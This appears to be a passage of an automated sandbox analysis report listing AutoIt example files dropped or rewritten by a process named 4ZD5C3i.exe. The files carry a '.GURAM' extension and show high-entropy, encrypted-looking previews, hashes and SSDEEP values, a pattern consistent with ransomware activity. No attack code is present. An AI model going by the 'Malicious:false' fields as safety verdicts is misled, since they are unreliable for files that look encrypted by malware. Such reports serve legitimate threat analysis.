                                                                                                                                                                                                                                                SHA-512:202BBB4154EDA664C6EC284AE58B6D48A5FF813789ACB26C69E369932173DF3E5D6827747D8BE2C78B1A310583F1DA1D41F46646800DEB1AACF2B20C22150EEE
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                                Preview:.l.^vs..2.MN...w$6%....O..C..}..............1.d...y.R..!V..X.....j.3..,...kj......x...i..!.`.Te.I..L....5..0.^\.[..+...+lz.......N<gM..Q.q}K..c...k.g9..XO.V-....K."..2..]$.0.S..O.0T...N........Pe.g..M.%.>...;J.....;...R&...u.?-.D.0R.z...@3E....7../.8..l...c.n4.]...M&z./......?....e.......=o.3.v.n...Sw...v......k...D...O.6.........:gP.{jt....=..0.?F...&.....Bkj....4+`"......O...k.G...X...r......K..2~...l.;..}.?-.Z..g....jC6.6.G~...J-..{.:X..s...E......0..U..?`/;...Xi...\.!.U)2.!.&.0@....Ld.9...U.F.'.a.1M<...7D\.....&.z|..h....U.([..L/.1...lt..r}.es.:..[.gT0C........u..J....0s...<.n...J.].C:..7.hg%0.WS...=..Z..../.l...G9.._}...K....5..........pe...D..@.....e.nP...l...yj..o..J.........T..a...C../&..NV/F....p!.sg..$?...j.*.p.1_.O.]..I.Sh.qC...k.XB..<.4O.....tt ..=.9B..Z...B...t......$.{.q..;....@......L-u..l$..,x.gIA..<..6p.+.E\7E.j.[...0..#.)5ML......{.'..X..]R..h....cj^d..Rz.7..-.....j8H,..m...&....[.cO.Q...^-....)..ed$..KZ..K.....b..LV.....U

                                                                                                                                                                                                                                                C:\Program Files (x86)\autoit3\Examples\Helpfile\_ArrayInsert[2].au3.{BB5EFC24-51A9-DB6D-27DC-3EA48BD33F86}.GURAM (copy)

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exe
                                                                                                                                                                                                                                                File Type:OpenPGP Secret Key
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):2219
                                                                                                                                                                                                                                                Entropy (8bit):7.901369879636272
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:48:DfPCYBi9zNaLi3D4moshysx6JyYapW4LH4o0jZtw0:G4i9ZaLiTmsosU36lIle0
                                                                                                                                                                                                                                                MD5:12475FEF852647EFD277383C199BE92A
                                                                                                                                                                                                                                                SHA1:2945C04E2BE8BD0B5BBDD81ADDCFC0BFF5E58C22
                                                                                                                                                                                                                                                SHA-256:95C5BDA9029BD9905BB8BFC731A5E9F6E3388A044826CCCA873BD220CFEA069D
                                                                                                                                                                                                                                                SHA-512:EC94CC3B7BEE2EA78A0985CE16799F4B7E156E400A8EC420B583D92C5AA5B9AA395B5AC7008B5EF09B59E86523A7FEE1263C8ACA760ADCD5840884ECB4576818
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                                Preview:..X.....7.}...y'6.<..+....>U....U.|o.. .'..L.fA#.....J.G..%]..A....;$=..u...?. '.|8..gl....~lx.V......a.jLeJ..%...K.D....1b.x..t.R..y..}.B/4.......mA,.V...JO.2s...{..l.!.....&....C.+.E+.i..t.......C..l....-..c..c..[._.M..J.....)...YL`..@..4._D...PS...P...I.O...M.7O b.......Y....W`/..t..|N.UH6....s/..`.6&.] X...O..?.}...(G..N..H/.R.....T'p`9J.1....]..1.R.wb..A..hr..v...:..%B#.9.z..9:.e.?.....\;G.......mfO.....YuK.p!...H.4i.k..W.\..0F...~.0...`M.?...Q..7(.N2.6kG.OL^..u.....w...Y....EcE.....#(.s...}..IP.I...{).w.......?...c+...;.......L...d...%.CF;.z....O..<..N.c.2.6.B`.[...p*..?Q.h..... .:Y....kr..\.0..d.n..P.......t.OA..H.}@..=.....=...9?,......U..obn....#.B;C....F.KZ.G..f4.QJR.1=.8WV>.y;......h'.0b1.}.......,.;......z.....OF{6b..Pp`P.......L..o.?R...........}-.|..5..-g.2u.....A.:[.wd...6.......:.........H.by...U......'9....<.....(..{....l|........T!`...O.....s...[...F..T......j.YS....H....lFQ....[f..[.{..J..;R.....$.K.X

                                                                                                                                                                                                                                                C:\Program Files (x86)\autoit3\Examples\Helpfile\_ArrayInsert[3].au3.{BB5EFC24-51A9-DB6D-27DC-3EA48BD33F86}.GURAM (copy)

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exe
                                                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):1631
                                                                                                                                                                                                                                                Entropy (8bit):7.867309417620764
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:24:se0c6gC8sQg+PoLkMDqHYyPQ30W6lTWWajmJrc0YXUZtwsTjG:sLgHg2oQMYT/W4o0jZtwV
                                                                                                                                                                                                                                                MD5:82FAADD5B3D34B138A059013085ABA0C
                                                                                                                                                                                                                                                SHA1:085A2368B7BD7BEE089D1AA8488A85C471EBE2AF
                                                                                                                                                                                                                                                SHA-256:11D1D2C24499ECC90A7C4875F065814742DD38B73E7E006EBD41851B8AB1036B
                                                                                                                                                                                                                                                SHA-512:4ADB3202FA730A43BEC3A40FADADA6941B46ADCF478CE3A5E3CA367AABEFCABF5A33A989C9400BE5670AC2B04047BBA724041D64EEA5AB783B84A67B225F2B5C
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                                Preview:.Z..4.H".p1.k.@2.G.2.g@.'y.....3I3..a......1.k.T+w........=`..]3~......_..v..}.E.....>......F....>....P.c..Q.O%D..Yj?..9(....d.....|....P.#H../..........c.t.[a.:.LDJ.rx4.....j....Pe ;.ZX...S"b/..:oV.......Y../.#[...HVA'\....aD..[[.l.,.C.......t..d.)s..Y.....o.12%...Z@}.'@...%.zhx........./..G.u |...z..,3$.dG.....J..26....Gy.~."Lz....ebX....Hm./.2L.8...B..w...U...=..8.0...38...J.(.........>..K'E..L.......W.[.X.....J...J...[.,......?.u..d..\c.......-6....I..B..<x....KA...VH.R...&..ML.....d..+..}^....~[.3....q..W.W...N...S.).R...u....ex........T....-E...I..........k./.tQl[..__.i<..,.L_I).....]Rz......[qZ...0....vz.};.A.9...i.T.S...B..Po....c.....q.....m.b>...u.Qq...ou..,..lm|[.9S^...<[@...}...+N...y)4...F..P....kH.U3..Q4?.5..D".=AU..{.......P.l}^...H.v~.T.#%..K(Z0D\A..,..R.....=.3..q........P.....j b.....r..w...c.A.Z...k.J.<{........Q.*......q..3....tne5:...\...D..k...........FQ.]}.D..\.#..?......5.....f...`...k.......b....K+p.g<."..\..

                                                                                                                                                                                                                                                C:\Program Files (x86)\autoit3\Examples\Helpfile\_ArrayMax.au3.{BB5EFC24-51A9-DB6D-27DC-3EA48BD33F86}.GURAM (copy)

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exe
                                                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):1096
                                                                                                                                                                                                                                                Entropy (8bit):7.812296231254359
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:24:QOV8AcAHWQhn+dEi9MILjmJrc0YXUZtwsTj:xV8AcAHWQhnqEejP4o0jZtws
                                                                                                                                                                                                                                                MD5:CFFF33F78A41D6719B1B0E2CDBEF4A89
                                                                                                                                                                                                                                                SHA1:23C483938209148249FF4A90E3F1E367872521B8
                                                                                                                                                                                                                                                SHA-256:A82778454E0CF8066A16E0051850D87381620CEC4006CC40F54446552EADD2C5
                                                                                                                                                                                                                                                SHA-512:70329C928A1B3FC0FBD8EE9BF6DC66B92F0DECEF290F937D8CEB7F3766AEBEE64E51FDC42D6B9C6A3CAAB7CB26B7D3489198370FF0C0D54CC6EDCF0C1BD7525D
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                                Preview:<#.J.....;...&@.Ck..MY...W....rJ.e.n.p?.Kr,..4..X...6...?.O.8.7.e.*.eU(...p..=.R....DG*.F.Nt.?Q..(N....$..D.+.L.%Q......H.O:..s0i?.9.{.xD>.O.]..P\Omo/R<.....L.:.n.g.sU.#.N7.......NB.M8.Vq@B........o........K....:kK.?.#.M..*E'...L.F.+r..). .....Tk>.......^....._.....;#h.jf]}U..L.g..W....>{H~}..Iu.Od......T`).k..9J./O......-/..1.K..>..c.|w16.b~.c/.........C...C.k....!FJ......N...A}z....Ep.....S....,..]rsr.v.Mt.TWcg....m...o:i.VCLa..6.|....'.{.X-.U..u.~...3..@.w..>....=..=GsL.}<..\...{..g.v.Tq.cs..~..B.A.%.^..f<qp...;..P}.....|.y..l...kkd....,.8.....Y.5..%.|.,.G....E.)....t..v^V.t.s<m.s..i....=T..1.?wd#.).....LN.....}.O..F. ..ov.....7...y....^..=..Pk?..P.Q..y .U....=H[.ZsT..N........y........./yZ.A.]+....X....n...........vN.e!f....N....k.Qu.J%...u..)46c...6...l.}).A....4....3.'.....;..s^...F..O..h+,..\..F.....:[.>..Q.%k..U.|..............t...<.Mku.uW..g..m,Xw.}...N........5a.|....U.;D..._.....Z..C...._g...W.o....Fn$#jU.9..EL~..@&.....

                                                                                                                                                                                                                                                C:\Program Files (x86)\autoit3\Examples\Helpfile\_ArrayMaxIndex.au3.{BB5EFC24-51A9-DB6D-27DC-3EA48BD33F86}.GURAM (copy)

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exe
                                                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):1129
                                                                                                                                                                                                                                                Entropy (8bit):7.777657352693303
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:24:g1p0buRoo24YVyRVNrYHEQFzpjmJrc0YXUZtwsT0:gX0buR52zVygE4z54o0jZtwr
                                                                                                                                                                                                                                                MD5:A3669FEF3F4976C318E23827DD8171B2
                                                                                                                                                                                                                                                SHA1:C3FE24F4B921E9F9F96D6FC48B10F9F812E05D38
                                                                                                                                                                                                                                                SHA-256:BDF2B0364CD7F11078C73195030BF97236F2A89A25AAD4B4BD2C88663A334E45
                                                                                                                                                                                                                                                SHA-512:8A11686E4F96ED319C20DDDFF2B3CB94C204AFD84D46FFF490E2A05101D55AA3C39A447643DD6D5B172778B6AED835688E3DC52449D1FFAA2D61654B5A5ADFED
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                                Preview:C.7.|..D!........$.g.....M..mY....;..3I..z...2..p..r.j..(Q.l../83..CU......(.........p...K;....Hj>n.w^.y665..,l.}.1....1,.......@0.....y..:.q.n..pw>a)E:.Mw....'..8..}.I.#..{..W.9.l.G....y..{g.?{...<J.P..n.J.. ......W.u1.$.G.M..As...-..@l.[. M...r.8.....p.....B...$...H.'.@....3..O[=. ...,CS...t..@.I3.-.D/@q.@..@.1S..2.p.m|.l..*..W..A.=..Bv..vZ.#F.B.F..E8+UJ..4..vP..........j..A.O......g0W.!624".a...!.Z^f..&w.F.g!4.....D>.h.d!......k fNWJH.].............aO...A.&...$8o..0T..%.,..X.w..|v.@.>.>....=..=GsL.}<..\...{..g.v.Tq.cs..~..B.A.%.^..f<qp...;..P}.....|.y..l...kkd....,.8.....Y.5..%.|.,.G....E.)....t..v^V.t.s<m.s..i....=T..1.?wd#.).....LN.....}.O..F. ..ov.....7...y....^..=..Pk?..P.Q..y .U....=H[.ZsT..N........y........./yZ.A.]+....X....n...........vN.e!f....N....k.Qu.J%...u..)46c...6...l.}).A....4....3.'.....;..s^...F..O..h+,..\..F.....:[.>..Q.%k..U.|..............t...<.Mku.uW..g..m,Xw.}...N........5a.|....U.;D..._.....Z..C...._g...

                                                                                                                                                                                                                                                C:\Program Files (x86)\autoit3\Examples\Helpfile\_ArrayMin.au3.{BB5EFC24-51A9-DB6D-27DC-3EA48BD33F86}.GURAM (copy)

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exe
                                                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):1096
                                                                                                                                                                                                                                                Entropy (8bit):7.750061789365574
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:24:88myal8HNc5Zyqf48PDkPOID1jmJrc0YXUZtwsTQR:8ryayHevfwPOg4o0jZtw7R
                                                                                                                                                                                                                                                MD5:1A6783677871D4381DCC1F752C9D6575
                                                                                                                                                                                                                                                SHA1:979EE847234591A6040C5572C34A46BE2426B69D
                                                                                                                                                                                                                                                SHA-256:F2C518871915D451EAEB8EFD5F157EA70FE721AB29F1A9A72390AEDC33F61FD9
                                                                                                                                                                                                                                                SHA-512:6248FC459CEDD16B7B0ECB4243F75E399A71148219F532F9BD50BECFA57BF47C745914E994CDE784F5E779F1DAD14366C77B1299B6E44D9386A698483C718B33
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                                Preview:....l.[a...\....}..z.h....a..~;.bO.*d..HH.1f*...J...{...o....J2f......=3....{...n,ew..........).X....f...Iy..M.h..:....o!_..^x{.uv.D.J.S...pEb...K...V%.u5.D...G.....py.8..`v......".7....:.s............^Q.......H=.....N).. .|.u..G....(.. ..y..a.ND....=.'.%.-u..Q..mN.m..u&.'....@.6.6C..y$.#B.....0 ..N==.L.w=#..a'.8....)......B......<.c...D....n...?...XNs.0..|...f.b..L@P..1.G..Z.|K[..|.....u<....G...8P.J.../D.n0R{!.%..%..Hc=...<7..[..6...N..D.)Q3...yf.s.ed....w.>....=..=GsL.}<..\...{..g.v.Tq.cs..~..B.A.%.^..f<qp...;..P}.....|.y..l...kkd....,.8.....Y.5..%.|.,.G....E.)....t..v^V.t.s<m.s..i....=T..1.?wd#.).....LN.....}.O..F. ..ov.....7...y....^..=..Pk?..P.Q..y .U....=H[.ZsT..N........y........./yZ.A.]+....X....n...........vN.e!f....N....k.Qu.J%...u..)46c...6...l.}).A....4....3.'.....;..s^...F..O..h+,..\..F.....:[.>..Q.%k..U.|..............t...<.Mku.uW..g..m,Xw.}...N........5a.|....U.;D..._.....Z..C...._g...W.o....Fn$#jU.9..EL~..@&.....

                                                                                                                                                                                                                                                C:\Program Files (x86)\autoit3\Examples\Helpfile\_ArrayMinIndex.au3.{BB5EFC24-51A9-DB6D-27DC-3EA48BD33F86}.GURAM (copy)

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exe
                                                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):1129
                                                                                                                                                                                                                                                Entropy (8bit):7.796511125551028
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:24:dvlfu15DTJvegweCkAY8IUF31+DjmJrc0YXUZtwsTBS:dgxdWgweCUUF31+H4o0jZtwOS
                                                                                                                                                                                                                                                MD5:1021438E65F2197B1C66F870EB039929
                                                                                                                                                                                                                                                SHA1:FE75D92108017E859C9B13130305274D53D51AE2
                                                                                                                                                                                                                                                SHA-256:570DE8D8F3EDDDE8E3159530393436944414AADC6C642C073025C31C43F263E8
                                                                                                                                                                                                                                                SHA-512:F8E674AA5688DD82A707DA0EC62754531B88EC3FCDA9EBD822184CAACD037D5310B2F89D464038C338990DF5C21E8A32659083842D12252B77565125A13DF3B5
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                                Preview:...1$..v...g.}...b.c.].'."..K..Z.......c.j....Q.{=.f.. ..~..q4........]&3..b...&....T5j.R~.w.78A....oT..RB..x/.E.$.-v.!.!.._.5.c.y.9.p.....X..r.......O..oO....4......_..%..e..I}{...#...+..Q...a......x.h-...~U..B.dP!u...;.q|e....0.[U..l+.qk9.v.}5.....7N.-4....1...>...n.....Lw.w(......;DiM..v.!..c.......&...hB]s:.%...gC.....A..zi........B.]..u...>.u(...-.{.~...4........t.........."..m|.D..&W.Ux..fb..{y.-.E.{v...h@..Y..G..<vw.....18.1...u.3..k...9....c.C....G....E:~G...N.T(x.1..f.6.1.:.d..>....=..=GsL.}<..\...{..g.v.Tq.cs..~..B.A.%.^..f<qp...;..P}.....|.y..l...kkd....,.8.....Y.5..%.|.,.G....E.)....t..v^V.t.s<m.s..i....=T..1.?wd#.).....LN.....}.O..F. ..ov.....7...y....^..=..Pk?..P.Q..y .U....=H[.ZsT..N........y........./yZ.A.]+....X....n...........vN.e!f....N....k.Qu.J%...u..)46c...6...l.}).A....4....3.'.....;..s^...F..O..h+,..\..F.....:[.>..Q.%k..U.|..............t...<.Mku.uW..g..m,Xw.}...N........5a.|....U.;D..._.....Z..C...._g...

                                                                                                                                                                                                                                                C:\Program Files (x86)\autoit3\Examples\Helpfile\_ArrayPermute.au3.{BB5EFC24-51A9-DB6D-27DC-3EA48BD33F86}.GURAM (copy)

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exe
                                                                                                                                                                                                                                                File Type:Arhangel archive data
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):852
                                                                                                                                                                                                                                                Entropy (8bit):7.742259010890459
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:12:Ah88gV7YwVl/OVzNQcjaGJYIsS+WwgHIc0jmksXU4HrkW6tDJum1qDkXvsO1xXZ8:A8VUwVlWV2cjmJrc0YXUZtwsTb7w
                                                                                                                                                                                                                                                MD5:4694B811CE0748C42C6E9E2E26B4F873
                                                                                                                                                                                                                                                SHA1:4C6171C2853A709A701942648999F4CFC7691D2F
                                                                                                                                                                                                                                                SHA-256:0EE1CFCB500749DB7B016BF007C8885772F840E5C320520112FC2E0404ECBB65
                                                                                                                                                                                                                                                SHA-512:D54315715386ED56289A2463F1E7DA037B7C4250B6D4E903A3B242A4DE4A928CB38E3BE4338B1E84EDB167B5A62F44E60EA0883A63EE145483875C60B8919B38
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                                Preview:LG.....q.WY.*.@h.G0..@.m. ..>*4...4bN..!6..>'2.%....n..;}<....;>J<...`.t....h.7.,J.\...".q..~u.......2..,w..B...j.....^.z.(.*...]"...,G.`...6.[.F....&....M.....I@hF...^...7.fo.x...O..>....YE.u.(w.o._.i.#...........:4n.(.......0.=.9..>....=..=GsL.}<..\...{..g.v.Tq.cs..~..B.A.%.^..f<qp...;..P}.....|.y..l...kkd....,.8.....Y.5..%.|.,.G....E.)....t..v^V.t.s<m.s..i....=T..1.?wd#.).....LN.....}.O..F. ..ov.....7...y....^..=..Pk?..P.Q..y .U....=H[.ZsT..N........y........./yZ.A.]+....X....n...........vN.e!f....N....k.Qu.J%...u..)46c...6...l.}).A....4....3.'.....;..s^...F..O..h+,..\..F.....:[.>..Q.%k..U.|..............t...<.Mku.uW..g..m,Xw.}...N........5a.|....U.;D..._.....Z..C...._g...W.o....Fn$#jU.9..EL~..@&........... S....6.K.F-aY.I.wp6..2-$........M5.8F...I....2..Eq.x..S/.W.i....................fk.W...f

                                                                                                                                                                                                                                                C:\Program Files (x86)\autoit3\Examples\Helpfile\_ArrayPop.au3.{BB5EFC24-51A9-DB6D-27DC-3EA48BD33F86}.GURAM (copy)

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exe
                                                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):1137
                                                                                                                                                                                                                                                Entropy (8bit):7.8289697939751
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:24:Vnigg6gHgvz/NspqzYfcr8+jmJrc0YXUZtwsTx:s6MgvJspTcrv4o0jZtw2
                                                                                                                                                                                                                                                MD5:EB4CB584AE052265822D5D4272A21A32
                                                                                                                                                                                                                                                SHA1:D46FA0E7C65155732C6C2B9AF8E079B48D6B23E1
                                                                                                                                                                                                                                                SHA-256:C26663C40DCB15009B78FED999C9FC615059850A56F6EEC0998980665AC19178
                                                                                                                                                                                                                                                SHA-512:38A4BA27C2FDD7E6A3066FE68F9C60530BEEC934E68C7D039D5B1C7EE9F6ECDB50BE75BF0D216799B2287ECB362F64E921725C1F215B84E1C25794E344E7EB99
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                                Preview:..:"....?7.UF..V.....h..,G.)S........8...J./WI#VWSN# ...&_KTg|...Kh...."+..=?.U.....C{.h..{.,]O.F[g.......BF.*.A..P.T.~zM..D.-e.L..b[.WuJk........3.z.K!...#.+bSP...h. .wq...m........Wb..A?.=...{.k.....F.V,..gm2*._~...yb~)8.s...c...A.)7...#.Q.h....g...o5.v./+QU.l.ooFPqf.b.....\z^l.+F.....3.V.N!..1.v2Q..:7..]..?..YZ.}`..sOp..@.<:....Qf;.1.....sS%.BV...8.3..&8.^0..{U!R... ...m..;'2.`Z.+.f.(Z`.A$.8}.D..Hx...2....u@..........2"....3C)xM8....(>.z(..+w...`....*X.s.5PlU\BS.3...1Ro....s....D...R.'.ai...*..TYMw.>....=..=GsL.}<..\...{..g.v.Tq.cs..~..B.A.%.^..f<qp...;..P}.....|.y..l...kkd....,.8.....Y.5..%.|.,.G....E.)....t..v^V.t.s<m.s..i....=T..1.?wd#.).....LN.....}.O..F. ..ov.....7...y....^..=..Pk?..P.Q..y .U....=H[.ZsT..N........y........./yZ.A.]+....X....n...........vN.e!f....N....k.Qu.J%...u..)46c...6...l.}).A....4....3.'.....;..s^...F..O..h+,..\..F.....:[.>..Q.%k..U.|..............t...<.Mku.uW..g..m,Xw.}...N........5a.|....U.;D..._.....Z..C.

                                                                                                                                                                                                                                                C:\Program Files (x86)\autoit3\Examples\Helpfile\_ArrayPush.au3.{BB5EFC24-51A9-DB6D-27DC-3EA48BD33F86}.GURAM (copy)

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exe
                                                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):1190
                                                                                                                                                                                                                                                Entropy (8bit):7.814258123287578
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:24:cf5+dJhgYDuDs9YNWlCtpLvSZqfjmJrc0YXUZtwsTCSa:cf5+d1qCYNWmpLSA4o0jZtwhSa
                                                                                                                                                                                                                                                MD5:DB59B7021FD0B7783F2047CAC12F7EF7
                                                                                                                                                                                                                                                SHA1:826E5AD5D1A36CF0E3525D798A5962AED0368C56
                                                                                                                                                                                                                                                SHA-256:1274F70183426BFB4F5C5BA1B965C8FE046C56EA7BC0A5A3FCFEE2026F6E93F7
                                                                                                                                                                                                                                                SHA-512:F39428CCFC50E4589F6EFA8EDCABD25D12246E1F6A32E54443D5CF284FC4607F3E6CD03DACA9BAEEB59B0899B1F59BA1EC002F06D4220BE684BA8A3BCB52C17B
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                                Preview:.4..u.]..."..H=*..J.x.E..4..p........^N..(.vf..zsY.U.......r...}..y.b...?..UA..M.xXz{n]$R..=....x.$.,v...`.S..Yl...wX".4'6...AV.2b....L.(..c..f.qE......I.;4r...H............T..w...5._.@. ...s.Zd..d2. .u6...w.U}...Ce..z...5Z.O..._..{.._.c.o..]....`.^.MM/....<i.@.@.|...J...^..3....OV....c....C}j.",.....&....2..VU._....%2?.^e.....:..........s.n.Xd.i..-.........u....*.._....1._J..U..:.h.+.,o.p..U/.O...R..'eB..y.Y4...n..#.}..g..\.f.4.>.....{.........vM.y..._..*...m.0ob..x.,.'..3..t\.!.}.g.H.x....."Q.;.:..;........F<s...VU....._Q.Y..o.<......xs..y3..w|(.P...>....=..=GsL.}<..\...{..g.v.Tq.cs..~..B.A.%.^..f<qp...;..P}.....|.y..l...kkd....,.8.....Y.5..%.|.,.G....E.)....t..v^V.t.s<m.s..i....=T..1.?wd#.).....LN.....}.O..F. ..ov.....7...y....^..=..Pk?..P.Q..y .U....=H[.ZsT..N........y........./yZ.A.]+....X....n...........vN.e!f....N....k.Qu.J%...u..)46c...6...l.}).A....4....3.'.....;..s^...F..O..h+,..\..F.....:[.>..Q.%k..U.|..............t...<.Mku

                                                                                                                                                                                                                                                C:\Program Files (x86)\autoit3\Examples\Helpfile\_ArrayReverse.au3.{BB5EFC24-51A9-DB6D-27DC-3EA48BD33F86}.GURAM (copy)

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exe
                                                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):939
                                                                                                                                                                                                                                                Entropy (8bit):7.75064065816401
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:24:lZrEv10GKTSQg2h6LCyjmJrc0YXUZtwsT7iL:lZIedT1th6Lj4o0jZtwQi
                                                                                                                                                                                                                                                MD5:D1CE53D6645ADD4A579E69DE4B99F452
                                                                                                                                                                                                                                                SHA1:C96816176C2FB5A68B53C58C46EBF04776FE318E
                                                                                                                                                                                                                                                SHA-256:F7936511A67E73B46A71E2CA83C76AB88CA3D7DEE0200B5A72FFCF21A9477064
                                                                                                                                                                                                                                                SHA-512:5939B3921F1CA7385BDD28CE4995E063758A74C152C8A97E3AE700E435B4707AC4F1F3EFC0C0D1910AE51980B1043B29ABF243C7310E31D7DA9A51872AE8E7C9
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                                Preview:....z.......E+.69~VB.....NT.....A.D.XD<.....X>..f.~.|L:.&T.gx....a...n;.M.."`<..Xuy)..1.8v...{..e..M..P.:rd.|W...-A[.{.m..\...V.jW.{..Fq&.r.C...;....ZO.]*Q....cX.@f.+n..........**..;.A.).....;Y....:....I......._sg.Jf..;g.....mP.&DD..I...LS.mh^q....>...............R\y..,....7. .@...F.....@<.z..0.Z..4..3.B..sI.`...>....=..=GsL.}<..\...{..g.v.Tq.cs..~..B.A.%.^..f<qp...;..P}.....|.y..l...kkd....,.8.....Y.5..%.|.,.G....E.)....t..v^V.t.s<m.s..i....=T..1.?wd#.).....LN.....}.O..F. ..ov.....7...y....^..=..Pk?..P.Q..y .U....=H[.ZsT..N........y........./yZ.A.]+....X....n...........vN.e!f....N....k.Qu.J%...u..)46c...6...l.}).A....4....3.'.....;..s^...F..O..h+,..\..F.....:[.>..Q.%k..U.|..............t...<.Mku.uW..g..m,Xw.}...N........5a.|....U.;D..._.....Z..C...._g...W.o....Fn$#jU.9..EL~..@&........... S....6.K.F-aY.I.wp6..2-$...,.i.......J..c.....{.,..]..`.]mzK...................fk.W...f

                                                                                                                                                                                                                                                C:\Program Files (x86)\autoit3\Examples\Helpfile\_ArraySearch.au3.{BB5EFC24-51A9-DB6D-27DC-3EA48BD33F86}.GURAM (copy)

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exe
                                                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):1169
                                                                                                                                                                                                                                                Entropy (8bit):7.811681091596941
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:24:Jlyz6nR6vB+o1+1E5SKCnvFm4chOC4YmALdjmJrc0YXUZtwsTS:JlnsSXKCvFfcoC4FALl4o0jZtw9
                                                                                                                                                                                                                                                MD5:26F689371D8ED2AE525BDB65D000B94E
                                                                                                                                                                                                                                                SHA1:6BB772D52EFCB790453FABCF9AAE3E5DD1A5885A
                                                                                                                                                                                                                                                SHA-256:F6AA23034B5DED311EB17EA7B42729518990448BE5A334D4AF0990A499C50434
                                                                                                                                                                                                                                                SHA-512:275839BE91CBDE168AED903348C8AC6AD48DFE14FC2AF4A763122ADCAF24544DB7420FCE8A76960F68A21956E99493E984F8404A9CEE166CEA3BAD09ABA1B29F
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Reputation:unknown
